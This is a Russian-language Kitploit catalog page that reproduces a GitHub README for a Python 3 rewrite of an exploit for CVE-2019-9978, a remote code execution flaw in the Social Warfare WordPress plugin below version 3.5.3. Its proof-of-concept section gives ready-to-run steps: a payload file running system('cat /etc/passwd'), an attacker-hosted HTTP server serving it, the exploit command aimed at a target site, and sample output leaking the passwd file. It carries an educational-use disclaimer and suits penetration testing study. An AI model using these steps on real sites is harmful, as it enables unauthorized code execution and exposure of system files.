Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-9978 — Уязвимость удаленного выполнения кода (RCE) в плагине Social Warfare для WordPress, затрагивающая версии ниже 3.5.3. | Kitploit
Инструменты/GitHubGitHub/echoosso/cve-2019-9978
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеРазработка Полезной Нагрузки
GitHubechoosso/cve-2019-9978

CVE-2019-9978

Уязвимость удаленного выполнения кода (RCE) в плагине Social Warfare для WordPress, затрагивающая версии ниже 3.5.3.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2019-9978 - Уязвимость RCE в плагине Social Warfare для WordPress версий ниже 3.5.3

Уязвимость удаленного выполнения кода (RCE) в плагине Social Warfare для WordPress, затрагивающая все версии ниже 3.5.3.


💡 Мотивация

Оригинальный публичный эксплойт был написан на устаревшей версии Python и больше не работает должным образом в современных средах.
Я переписал эксплойт, чтобы он был полностью совместим с Python 3, что упрощает его использование, понимание и интеграцию в современные инструменты.


Доказательство концепции (PoC)

✅ Шаг 1 – Создание полезной нагрузки

Создайте файл с именем payload.txt со следующим содержимым:

root@kitploit:~
<pre>system('cat /etc/passwd')</pre>

✅ Шаг 2 – Запуск Python HTTP-сервера

Используйте Python для обслуживания вашей полезной нагрузки:

root@kitploit:~
python3 -m http.server 8000

Это сделает ваш payload.txt доступным по адресу:

root@kitploit:~
http://<your-ip>:8000/payload.txt

✅ Шаг 3 – Запуск эксплойта

root@kitploit:~
python3 CVE-2019-9978.py --target http://<target-ip>/wordpress \
                         --payload-uri http://<your-ip>:8000/payload.txt

Ожидаемый вывод

Если цель уязвима, вы получите вывод, похожий на:

root@kitploit:~
[*] Received Response From Server!
[<] Received:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...

Скриншоты

HTTP-сервер получает запрос

HTTP-сервер получает запрос

Успешное выполнение эксплойта

Успешное выполнение эксплойта

Содержимое файла полезной нагрузки

Содержимое файла полезной нагрузки


🧬 Если эта нагрузка сделала ваш день, звездочка ⭐ сделает мой.

Технические подробности

  • Плагин: Social Warfare
  • Затронутые версии: < 3.5.3
  • CVE: CVE-2019-9978
  • Тип уязвимости: Удаленное выполнение кода (RCE)
  • Оригинальный автор: @hash3liZer
  • Исследователь: Luka Sikic

Благодарности

  • Автор эксплойта: @hash3liZer
  • Переработка для Python 3: @echosso

⚠️ Отказ от ответственности: Этот репозиторий предназначен только для образовательного и этического тестирования.
Несанкционированное использование этого эксплойта против систем, которые вам не принадлежат, строго запрещено.

Скачать инструмент